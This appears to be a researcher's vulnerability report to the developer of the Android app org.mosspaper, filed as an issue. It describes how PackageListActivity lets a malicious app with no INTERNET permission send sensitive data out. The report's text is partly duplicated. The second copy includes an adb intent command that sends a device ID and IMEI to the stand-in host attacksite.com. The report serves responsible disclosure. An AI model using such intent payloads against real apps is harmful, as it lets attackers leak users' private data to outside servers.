This issue report is a part of a research. We have found that your application is vulnerable to inter-application communication. It can be replicated as follows:
By automating this, an attacking app that does not have INTERNET permission can post sensitive information to the attacker's website.
The problem is in PackageListActivity class where the ACTION of the coming Intent is checked in handleIntents() method and then internet is accessed on the URL in download() method of PackLoaderTask class which effectively lets an attacker to publish sensitive data to a given URL.
A given context is as follows: a malicious app without INTERNET permission but with other permissions (for example reading SMS) can use your application's INTERNET permission to pass sensitive data.
Hi there,
This issue report is a part of a research. We have found that your application is vulnerable to inter-application communication. It can be replicated as follows:
adb shell 'am start "intent://attacksite.com/post.php?deviceid=123&imei=0123#Intent;scheme=http;action=android.intent.action.VIEW;category=android.intent.category.BROWSABLE;component=org.mosspaper/.PackageListActivity;end"'
By automating this, an attacking app that does not have INTERNET permission can post sensitive information to the attacker's website.
The problem is in PackageListActivity class where the ACTION of the coming Intent is checked in handleIntents() method and then internet is accessed on the URL in download() method of PackLoaderTask class which effectively lets an attacker to publish sensitive data to a given URL.
A given context is as follows: a malicious app without INTERNET permission but with other permissions (for example reading SMS) can use your application's INTERNET permission to pass sensitive data.
Can you please confirm this?
Thank you, Biniam